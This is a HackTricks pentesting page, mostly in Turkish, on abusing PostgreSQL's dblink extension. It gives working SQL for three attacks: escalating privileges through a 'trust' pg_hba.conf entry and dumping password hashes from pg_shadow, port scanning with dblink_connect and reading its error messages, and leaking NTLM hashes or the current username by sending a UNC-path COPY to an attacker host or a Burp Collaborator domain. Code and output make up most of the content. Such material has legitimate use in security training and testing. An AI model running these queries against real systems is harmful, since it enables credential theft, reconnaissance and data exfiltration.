Network - Privesc, Port Scanner and NTLM chanllenge response disclosure

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Bu saldırılar hakkında orijinal belgede daha fazla bilgi bulun.

PostgreSQL 9.1'den itibaren, ek modüllerin kurulumu basittir. dblink gibi kayıtlı uzantılar CREATE EXTENSION ile kurulabilir:

CREATE EXTENSION dblink;

Bir kez dblink yüklendiğinde bazı ilginç numaralar yapabilirsiniz:

Yetki Yükseltme

pg_hba.conf dosyası şifreyi bilmeye gerek kalmadan localhost'tan herhangi bir kullanıcı ile bağlantılara izin verecek şekilde kötü yapılandırılmış olabilir. Bu dosya genellikle /etc/postgresql/12/main/pg_hba.conf konumunda bulunabilir ve kötü bir yapılandırma şöyle görünür:

local    all    all    trust

Not edin ki bu yapılandırma, admin şifreyi unuttuğunda bir db kullanıcısının şifresini değiştirmek için yaygın olarak kullanılır, bu yüzden bazen bunu bulabilirsiniz. Ayrıca, pg_hba.conf dosyasının yalnızca postgres kullanıcı ve grubu tarafından okunabilir ve yalnızca postgres kullanıcı tarafından yazılabilir olduğunu unutmayın.

Bu durum, zaten kurbanın içinde bir shell'e sahipseniz yararlıdır, çünkü size postgresql veritabanına bağlanma imkanı verecektir.

Başka bir olası yanlış yapılandırma, şöyle bir şeydir:

host    all     all     127.0.0.1/32    trust

Herkesin localhost'tan veritabanına herhangi bir kullanıcı olarak bağlanmasına izin verecektir. Bu durumda ve eğer dblink fonksiyonu çalışıyorsa, zaten kurulmuş bir bağlantı üzerinden veritabanına bağlanarak yetkileri yükseltebilir ve erişmemesi gereken verilere erişebilirsiniz:

SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'SELECT datname FROM pg_database')
RETURNS (result TEXT);

SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'select usename, passwd from pg_shadow')
RETURNS (result1 TEXT, result2 TEXT);

Port Scanning

dblink_connect kullanarak açık portları arayabilirsiniz. Eğer o fonksiyon çalışmıyorsa, belgelerde dblink_connect_u()'nun dblink_connect() ile aynı olduğu, ancak süper kullanıcı olmayanların herhangi bir kimlik doğrulama yöntemi kullanarak bağlanmasına izin vereceği belirtiliyor, bu yüzden dblink_connect_u() kullanmayı denemelisiniz.

SELECT * FROM dblink_connect('host=216.58.212.238
port=443
user=name
password=secret
dbname=abc
connect_timeout=10');
//Different response
// Port closed
RROR:  could not establish connection
DETAIL:  could not connect to server: Connection refused
Is the server running on host "127.0.0.1" and accepting
TCP/IP connections on port 4444?

// Port Filtered/Timeout
ERROR:  could not establish connection
DETAIL:  timeout expired

// Accessing HTTP server
ERROR:  could not establish connection
DETAIL:  timeout expired

// Accessing HTTPS server
ERROR:  could not establish connection
DETAIL:  received invalid response to SSL negotiation:

Not edin ki dblink_connect veya dblink_connect_u kullanmadan önce şunu çalıştırmanız gerekebilir:

CREATE extension dblink;

UNC yolu - NTLM hash sızıntısı

-- can be used to leak hashes to Responder/equivalent
CREATE TABLE test();
COPY test FROM E'\\\\attacker-machine\\footestbar.txt';

-- to extract the value of user and send it to Burp Collaborator
CREATE TABLE test(retval text);
CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$
DECLARE sqlstring TEXT;
DECLARE userval TEXT;
BEGIN
SELECT INTO userval (SELECT user);
sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\'';
EXECUTE sqlstring;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT testfunc();

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousPL/pgSQL Password Bruteforce NextBig Binary Files Upload (PostgreSQL)

Last updated 4 months ago

SELECT * FROM dblink('host=127.0.0.1 user=postgres dbname=postgres', 'SELECT datname FROM pg_database') RETURNS (result TEXT); SELECT * FROM dblink('host=127.0.0.1 user=postgres dbname=postgres', 'select usename, passwd from pg_shadow') RETURNS (result1 TEXT, result2 TEXT);

SELECT * FROM dblink_connect('host=216.58.212.238 port=443 user=name password=secret dbname=abc connect_timeout=10'); //Different response // Port closed RROR: could not establish connection DETAIL: could not connect to server: Connection refused Is the server running on host "127.0.0.1" and accepting TCP/IP connections on port 4444? // Port Filtered/Timeout ERROR: could not establish connection DETAIL: timeout expired // Accessing HTTP server ERROR: could not establish connection DETAIL: timeout expired // Accessing HTTPS server ERROR: could not establish connection DETAIL: received invalid response to SSL negotiation:

-- to extract the value of user and send it to Burp Collaborator CREATE TABLE test(retval text); CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$ DECLARE sqlstring TEXT; DECLARE userval TEXT; BEGIN SELECT INTO userval (SELECT user); sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\''; EXECUTE sqlstring; END; $$ LANGUAGE plpgsql SECURITY DEFINER; SELECT testfunc();